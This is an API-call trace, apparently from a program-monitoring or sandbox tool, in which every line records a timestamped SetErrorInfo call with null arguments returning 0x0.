[0061.429] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.429] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.429] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.429] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.429] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.430] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.431] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.432] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.433] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.434] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.434] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.434] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.434] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.434] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.434] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.434] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.435] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.436] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.436] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.436] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.436] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.436] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.436] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.437] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.438] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.439] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.440] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.441] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.442] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.443] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.444] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.456] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.456] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.456] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.462] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.462] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.463] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.464] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.465] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.466] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.470] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.470] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.472] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.473] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.474] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.474] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.475] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.475] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.475] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.475] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.476] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.485] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.485] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.488] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.488] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.488] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.488] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.489] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.489] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.489] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.489] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.489] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.489] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.489] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.490] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.491] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.492] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.493] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.494] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.495] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.496] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.497] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.498] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.499] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.500] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.501] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
